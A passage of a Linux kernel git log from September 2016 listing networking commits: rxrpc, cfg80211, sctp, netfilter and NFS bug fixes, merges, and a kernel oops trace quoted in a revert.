filled and there's more data to be consumed.  The softirq producer only
queues the call and wakes the socket if it fills the first slot in the
window, so userspace might end up sleeping forever otherwise, despite there
being data available.

This is not a problem provided the userspace buffer is big enough or it
empties the buffer completely before more data comes in.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:36:21 +01:00
David Howells
91c2c7b656 rxrpc: The IDLE ACK packet should use rxrpc_idle_ack_delay
The IDLE ACK packet should use the rxrpc_idle_ack_delay setting when the
timer is set for it.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:36:21 +01:00
David Howells
bc4abfcf51 rxrpc: Add missing wakeup on Tx window rotation
We need to wake up the sender when Tx window rotation due to an incoming
ACK makes space in the buffer otherwise the sender is liable to just hang
endlessly.

This problem isn't noticeable if the Tx phase transfers no more than will
fit in a single window or the Tx window rotates fast enough that it doesn't
get full.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:36:21 +01:00
David Howells
08a39685a7 rxrpc: Make sure we initialise the peer hash key
Peer records created for incoming connections weren't getting their hash
key set.  This meant that incoming calls wouldn't see more than one DATA
packet - which is not a problem for AFS CM calls with small request data
blobs.

Signed-off-by: David Howells <dhowells@redhat.com>
2016-09-13 22:36:21 +01:00
Johannes Berg
89b706fb28 cfg80211: reduce connect key caching struct size
After the previous patches, connect keys can only (correctly)
be used for storing static WEP keys. Therefore, remove all the
data for dealing with key index 4/5 and reduce the size of the
key material to the maximum for WEP keys.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 20:20:54 +02:00
Johannes Berg
e9c8f8d3a4 cfg80211: validate key index better
Don't accept it if a key_idx < 0 snuck through, reject WEP keys with
key index 4 and 5 (which are used for IGTKs) and don't allow IGTKs
with key indices other than 4 and 5. This makes the key data match
expectations better.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 20:20:53 +02:00
Johannes Berg
9381e267b6 cfg80211: wext: only allow WEP keys to be configured before connected
When not connected, anything but WEP keys shouldn't be allowed to be
configured for later - only static WEP keys make sense at this point.
Change wext to reject anything else just like nl80211 does.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 20:20:52 +02:00
Johannes Berg
386b1f2738 nl80211: only allow WEP keys during connect command
This was already documented that way in nl80211.h, but the
parsing code still accepted other key types. Change it to
really only accept WEP keys as documented.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 20:20:52 +02:00
Johannes Berg
42ee231cd1 nl80211: fix connect keys range check
Only key index 0-3 should be accepted, 4/5 are for IGTKs and
cannot be used as connect keys. Fix the range checking to not
allow such erroneous configurations.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 20:20:51 +02:00
Johannes Berg
b6b5555bc8 cfg80211: disallow shared key authentication with key index 4
Key index 4 can only be used for an IGTK, so the range checks
for shared key authentication should treat 4 as an error, fix
that in the code.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 20:20:51 +02:00
Johannes Berg
ad5987b47e nl80211: validate number of probe response CSA counters
Due to an apparent copy/paste bug, the number of counters for the
beacon configuration were checked twice, instead of checking the
number of probe response counters. Fix this to check the number of
probe response counters before parsing those.

Cc: stable@vger.kernel.org
Fixes: 9a774c78e2 ("cfg80211: Support multiple CSA counters")
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 20:19:27 +02:00
Xin Long
715f5552b1 sctp: hold the transport before using it in sctp_hash_cmp
Since commit 4f00878126 ("sctp: apply rhashtable api to send/recv
path"), sctp uses transport rhashtable with .obj_cmpfn sctp_hash_cmp,
in which it compares the members of the transport with the rhashtable
args to check if it's the right transport.

But sctp uses the transport without holding it in sctp_hash_cmp, it can
cause a use-after-free panic. As after it gets transport from hashtable,
another CPU may close the sk and free the asoc. In sctp_association_free,
it frees all the transports, meanwhile, the assoc's refcnt may be reduced
to 0, assoc can be destroyed by sctp_association_destroy.

So after that, transport->assoc is actually an unavailable memory address
in sctp_hash_cmp. Although sctp_hash_cmp is under rcu_read_lock, it still
can not avoid this, as assoc is not freed by RCU.

This patch is to hold the transport before checking it's members with
sctp_transport_hold, in which it checks the refcnt first, holds it if
it's not 0.

Fixes: 4f00878126 ("sctp: apply rhashtable api to send/recv path")
Signed-off-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-13 11:44:58 -04:00
Wei Yongjun
c20cb81193 tipc: fix possible memory leak in tipc_udp_enable()
'ub' is malloced in tipc_udp_enable() and should be freed before
leaving from the error handling cases, otherwise it will cause
memory leak.

Fixes: ba5aa84a2d ("tipc: split UDP nl address parsing")
Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-13 11:28:32 -04:00
Vivien Didelot
308433155a net: bridge: add helper to call /sbin/bridge-stp
If /sbin/bridge-stp is available on the system, bridge tries to execute
it instead of the kernel implementation when starting/stopping STP.

If anything goes wrong with /sbin/bridge-stp, bridge silently falls back
to kernel STP, making hard to debug userspace STP.

This patch adds a br_stp_call_user helper to start/stop userspace STP
and debug errors from the program: abnormal exit status is stored in the
lower byte and normal exit status is stored in higher byte.

Below is a simple example on a kernel with dynamic debug enabled:

    # ln -s /bin/false /sbin/bridge-stp
    # brctl stp br0 on
    br0: failed to start userspace STP (256)
    # dmesg
    br0: /sbin/bridge-stp exited with code 1
    br0: failed to start userspace STP (256)
    br0: using kernel STP

Signed-off-by: Vivien Didelot <vivien.didelot@savoirfairelinux.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-13 11:21:31 -04:00
David S. Miller
67b9f0b737 Merge git://git.kernel.org/pub/scm/linux/kernel/git/pablo/nf
Pablo Neira Ayuso says:

====================
Netfilter fixes for net

The following patchset contains Netfilter fixes for your net tree,
they are:

1) Endianess fix for the new nf_tables netlink trace infrastructure,
   NFTA_TRACE_POLICY endianess was not correct, patch from Liping Zhang.

2) Fix broken re-route after userspace queueing in nf_tables route
   chain. This patch is large but it is simple since it is just getting
   this code in sync with iptable_mangle. Also from Liping.

3) NAT mangling via ctnetlink lies to userspace when nf_nat_setup_info()
   fails to setup the NAT conntrack extension. This problem has been
   there since the beginning, but it can now show up after rhashtable
   conversion.

4) Fix possible NULL pointer dereference due to failures in allocating
   the synproxy and seqadj conntrack extensions, from Gao feng.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-13 11:17:24 -04:00
Johannes Berg
4854f175c3 mac80211: remove useless open_count check
__ieee80211_suspend() checks early on if there's anything
to do by checking open_count, so there's no need to check
again later in the function. Remove the useless check.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 15:39:29 +02:00
Gao Feng
4440a2ab3b netfilter: synproxy: Check oom when adding synproxy and seqadj ct extensions
When memory is exhausted, nfct_seqadj_ext_add may fail to add the
synproxy and seqadj extensions. The function nf_ct_seqadj_init doesn't
check if get valid seqadj pointer by the nfct_seqadj.

Now drop the packet directly when fail to add seqadj extension to
avoid dereference NULL pointer in nf_ct_seqadj_init from
init_conntrack().

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-13 10:50:56 +02:00
Laura Garcia Liebana
14e2dee099 netfilter: nft_hash: fix hash overflow validation
The overflow validation in the init() function establishes that the
maximum value that the hash could reach is less than U32_MAX, which is
likely to be true.

The fix detects the overflow when the maximum hash value is less than
the offset itself.

Fixes: 70ca767ea1 ("netfilter: nft_hash: Add hash offset value")
Reported-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Laura Garcia Liebana <nevola@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-13 10:49:23 +02:00
Johannes Berg
11d62caf93 mac80211: simplify TDLS RA lookup
smatch pointed out that the second check of "tdls_auth" was
pointless since if it was true, we returned from the function
already. We can further simplify the code by moving the first
check (if it's a TDLS peer at all) into the outer if, to only
handle that inside. This simplifies the control flow here.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 08:28:22 +02:00
Toke Høiland-Jørgensen
8d51dbb8c7 mac80211: Re-structure aqm debugfs output and keep CoDel stats per txq
Currently the 'aqm' stats in mac80211 only keeps overlimit drop stats,
not CoDel stats. This moves the CoDel stats into the txqi structure to
keep them per txq in order to show them in debugfs.

In addition, the aqm debugfs output is restructured by splitting it up
into three files: One global per phy, one per netdev and one per
station, in the appropriate directories. The files are all called aqm,
and are only created if the driver supports the wake_tx_queue op (rather
than emitting an error on open as previously).

Signed-off-by: Toke Høiland-Jørgensen <toke@toke.dk>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-09-13 08:20:16 +02:00
David S. Miller
b20b378d49 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Conflicts:
	drivers/net/ethernet/mediatek/mtk_eth_soc.c
	drivers/net/ethernet/qlogic/qed/qed_dcbx.c
	drivers/net/phy/Kconfig

All conflicts were cases of overlapping commits.

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-09-12 15:52:44 -07:00
Linus Torvalds
2c937eb4dd NFS client bugfixes for 4.8
Highlights include:
 
 Stable patches:
 - We must serialise LAYOUTGET and LAYOUTRETURN to ensure correct state
   accounting
 - Fix the CREATE_SESSION slot number
 
 Bugfixes:
 - sunrpc: fix a UDP memory accounting regression
 - NFS: Fix an error reporting regression in nfs_file_write()
 - pNFS: Fix further layout stateid issues
 - RPC/rdma: Revert 3d4cf35bd4 ("xprtrdma: Reply buffer exhaustion...")
 - RPC/rdma: Fix receive buffer accounting
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABAgAGBQJX1wEwAAoJEGcL54qWCgDysPMP/iEgzv6Peky9DVYG35btxZXC
 QQxZDfvOa3Xxe9cH0JwfyisaDHw2gO5RQqFFCCxA/x0dZsf2s3Nrjt6C9yH8q7qF
 i8c1OQ8oEBMgM+BsByCQniUubSaAvs2jVVpAs7G+eOYPSqxFKzsHJwDqqRp4aZrW
 YDohIumsHFoKl1GYCx9jv44wtmQQJjgIJ0Uq8SJvMkSzzRaGgVIeCbfpRgtqVD3g
 mU8k3XV0C+fnLgtwtlG1dkqbnuNSp1gT72f8joId+SJjtnGgjxqi0eIn48vY5k4N
 SJ5+4N6Uko87k9uQ2zn1UTR2Jrltn7mtMI7RHJVuiLnbZjAsf0lfOIF3sgItAwhS
 G0F/EHzMbt3+vs4P9EsGJgTcViVplgJeXw0hQIqXbJN0IwsXG0/UYGuPUFxtMOHQ
 +ko8BYJaNWcQCVdkFc5rVyt/tM6rKDahLlA3sIn3bCGssL67CYgkfNsBIoOEmjp9
 u4XTYwJYD2hXMpskc8W623voQ2/VDbbWB6bphmZH9EeOvlzRB5TW5OvEB0VE805+
 WYZal32LNnaUE4rpUtr78rYEvzPqn7tb9+OglP/tYa1QB3A0nwC9f74CDQ6s08oR
 K00fVXu9yffkBty8Cm0e4HpUcjT+95BMVdJUJU3lhbUbu+eq74L/32OSjuGmdRWf
 c4S6sHfgCeX6uJPCb2rD
 =j4kB
 -----END PGP SIGNATURE-----

Merge tag 'nfs-for-4.8-4' of git://git.linux-nfs.org/projects/trondmy/linux-nfs

Pull NFS client bugfixes from Trond Myklebust:
 "Highlights include:

  Stable patches:
   - We must serialise LAYOUTGET and LAYOUTRETURN to ensure correct
     state accounting
   - Fix the CREATE_SESSION slot number

  Bugfixes:
   - sunrpc: fix a UDP memory accounting regression
   - NFS: Fix an error reporting regression in nfs_file_write()
   - pNFS: Fix further layout stateid issues
   - RPC/rdma: Revert 3d4cf35bd4 ("xprtrdma: Reply buffer
     exhaustion...")
   - RPC/rdma: Fix receive buffer accounting"

* tag 'nfs-for-4.8-4' of git://git.linux-nfs.org/projects/trondmy/linux-nfs:
  NFSv4.1: Fix the CREATE_SESSION slot number accounting
  xprtrdma: Fix receive buffer accounting
  xprtrdma: Revert 3d4cf35bd4 ("xprtrdma: Reply buffer exhaustion...")
  pNFS: Don't forget the layout stateid if there are outstanding LAYOUTGETs
  pNFS: Clear out all layout segments if the server unsets lrp->res.lrs_present
  pNFS: Fix pnfs_set_layout_stateid() to clear NFS_LAYOUT_INVALID_STID
  pNFS: Ensure LAYOUTGET and LAYOUTRETURN are properly serialised
  NFS: Fix error reporting in nfs_file_write()
  sunrpc: fix UDP memory accounting
2016-09-12 14:13:45 -07:00
Chuck Lever
bf2c4b6f9b svcauth_gss: Revert 64c59a3726 ("Remove unnecessary allocation")
rsc_lookup steals the passed-in memory to avoid doing an allocation of
its own, so we can't just pass in a pointer to memory that someone else
is using.

If we really want to avoid allocation there then maybe we should
preallocate somwhere, or reference count these handles.

For now we should revert.

On occasion I see this on my server:

kernel: kernel BUG at /home/cel/src/linux/linux-2.6/mm/slub.c:3851!
kernel: invalid opcode: 0000 [#1] SMP
kernel: Modules linked in: cts rpcsec_gss_krb5 sb_edac edac_core x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm irqbypass crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel lrw gf128mul glue_helper ablk_helper cryptd btrfs xor iTCO_wdt iTCO_vendor_support raid6_pq pcspkr i2c_i801 i2c_smbus lpc_ich mfd_core mei_me sg mei shpchp wmi ioatdma ipmi_si ipmi_msghandler acpi_pad acpi_power_meter rpcrdma ib_ipoib rdma_ucm ib_ucm ib_uverbs ib_umad rdma_cm ib_cm iw_cm nfsd nfs_acl lockd grace auth_rpcgss sunrpc ip_tables xfs libcrc32c mlx4_ib mlx4_en ib_core sr_mod cdrom sd_mod ast drm_kms_helper syscopyarea sysfillrect sysimgblt fb_sys_fops ttm drm crc32c_intel igb mlx4_core ahci libahci libata ptp pps_core dca i2c_algo_bit i2c_core dm_mirror dm_region_hash dm_log dm_mod
kernel: CPU: 7 PID: 145 Comm: kworker/7:2 Not tainted 4.8.0-rc4-00006-g9d06b0b #15
kernel: Hardware name: Supermicro Super Server/X10SRL-F, BIOS 1.0c 09/09/2015
kernel: Workqueue: events do_cache_clean [sunrpc]
kernel: task: ffff8808541d8000 task.stack: ffff880854344000
kernel: RIP: 0010:[<ffffffff811e7075>]  [<ffffffff811e7075>] kfree+0x155/0x180
kernel: RSP: 0018:ffff880854347d70  EFLAGS: 00010246
kernel: RAX: ffffea0020fe7660 RBX: ffff88083f9db064 RCX: 146ff0f9d5ec5600
kernel: RDX: 000077ff80000000 RSI: ffff880853f01500 RDI: ffff88083f9db064
kernel: RBP: ffff880854347d88 R08: ffff8808594ee000 R09: ffff88087fdd8780
kernel: R10: 0000000000000000 R11: ffffea0020fe76c0 R12: ffff880853f01500
kernel: R13: ffffffffa013cf76 R14: ffffffffa013cff0 R15: ffffffffa04253a0
kernel: FS:  0000000000000000(0000) GS:ffff88087fdc0000(0000) knlGS:0000000000000000
kernel: CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
kernel: CR2: 00007fed60b020c3 CR3: 0000000001c06000 CR4: 00000000001406e0
kernel: Stack:
kernel: ffff8808589f2f00 ffff880853f01500 0000000000000001 ffff880854347da0
kernel: ffffffffa013cf76 ffff8808589f2f00 ffff880854347db8 ffffffffa013d006
kernel: ffff8808589f2f20 ffff880854347e00 ffffffffa0406f60 0000000057c7044f
kernel: Call Trace:
kernel: [<ffffffffa013cf76>] rsc_free+0x16/0x90 [auth_rpcgss]
kernel: [<ffffffffa013d006>] rsc_put+0x16/0x30 [auth_rpcgss]
kernel: [<ffffffffa0406f60>] cache_clean+0x2e0/0x300 [sunrpc]
kernel: [<ffffffffa04073ee>] do_cache_clean+0xe/0x70 [sunrpc]
kernel: [<ffffffff8109a70f>] process_one_work+0x1ff/0x3b0
kernel: [<ffffffff8109b15c>] worker_thread+0x2bc/0x4a0
kernel: [<ffffffff8109aea0>] ? rescuer_thread+0x3a0/0x3a0
kernel: [<ffffffff810a0ba4>] kthread+0xe4/0xf0
kernel: [<ffffffff8169c47f>] ret_from_fork+0x1f/0x40
kernel: [<ffffffff810a0ac0>] ? kthread_stop+0x110/0x110
kernel: Code: f7 ff ff eb 3b 65 8b 05 da 30 e2 7e 89 c0 48 0f a3 05 a0 38 b8 00 0f 92 c0 84 c0 0f 85 d1 fe ff ff 0f 1f 44 00 00 e9 f5 fe ff ff <0f> 0b 49 8b 03 31 f6 f6 c4 40 0f 85 62 ff ff ff e9 61 ff ff ff
kernel: RIP  [<ffffffff811e7075>] kfree+0x155/0x180
kernel: RSP <ffff880854347d70>
kernel: ---[ end trace 3fdec044969def26 ]---

It seems to be most common after a server reboot where a client has been
using a Kerberos mount, and reconnects to continue its workload.

Signed-off-by: Chuck Lever <chuck.lever@oracle.com>
Cc: stable@vger.kernel.org
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-09-12 16:57:16 -04:00
Pablo Neira Ayuso
ecfcdfec7e netfilter: nf_nat: handle NF_DROP from nfnetlink_parse_nat_setup()
nf_nat_setup_info() returns NF_* verdicts, so convert them to error
codes that is what ctnelink expects. This has passed overlook without
having any impact since this nf_nat_setup_info() has always returned
NF_ACCEPT so far. Since 870190a9ec ("netfilter: nat: convert nat bysrc
hash to rhashtable"), this is problem.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-12 20:32:57 +02:00
Liping Zhang
2e917d602a netfilter: nft_numgen: fix race between num generate and store it
After we generate a new number, we still use the priv->counter and
store it to the dreg. This is not correct, another cpu may already
change it to a new number. So we must use the generated number, not
the priv->counter itself.

Fixes: 91dbc6be0a ("netfilter: nf_tables: add number generator expression")
Signed-off-by: Liping Zhang <liping.zhang@spreadtrum.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-12 20:00:23 +02:00
Florian Westphal
8e8118f893 netfilter: conntrack: remove packet hotpath stats
These counters sit in hot path and do show up in perf, this is especially
true for 'found' and 'searched' which get incremented for every packet
processed.

Information like

searched=212030105
new=623431
found=333613
delete=623327

does not seem too helpful nowadays:

- on busy systems found and searched will overflow every few hours
(these are 32bit integers), other more busy ones every few days.

- for debugging there are better methods, such as iptables' trace target,
the conntrack log sysctls.  Nowadays we also have perf tool.

This removes packet path stat counters except those that
are expected to be 0 (or close to 0) on a normal system, e.g.
'insert_failed' (race happened) or 'invalid' (proto tracker rejects).

The insert stat is retained for the ctnetlink case.
The found stat is retained for the tuple-is-taken check when NAT has to
determine if it needs to pick a different source address.

Signed-off-by: Florian Westphal <fw@strlen.de>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-12 19:59:39 +02:00
Gao Feng
23d07508d2 netfilter: Add the missed return value check of nft_register_chain_type
There are some codes of netfilter module which did not check the return
value of nft_register_chain_type. Add the checks now.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-12 19:54:45 +02:00
Gao Feng
4e6577de71 netfilter: Add the missed return value check of register_netdevice_notifier
There are some codes of netfilter module which did not check the return
value of register_netdevice_notifier. Add the checks now.

Signed-off-by: Gao Feng <fgao@ikuai8.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-12 19:54:43 +02:00
Pablo Neira
cf71c03edf netfilter: nf_conntrack: simplify __nf_ct_try_assign_helper() return logic
Instead of several goto's just to return the result, simply return it.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-12 19:54:34 +02:00
Pablo Neira Ayuso
71212c9b04 netfilter: nf_tables: don't drop IPv6 packets that cannot parse transport
This is overly conservative and not flexible at all, so better let them
go through and let the filtering policy decide what to do with them. We
use skb_header_pointer() all over the place so we would just fail to
match when trying to access fields from malformed traffic.

Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-09-12 18:52:32 +02:00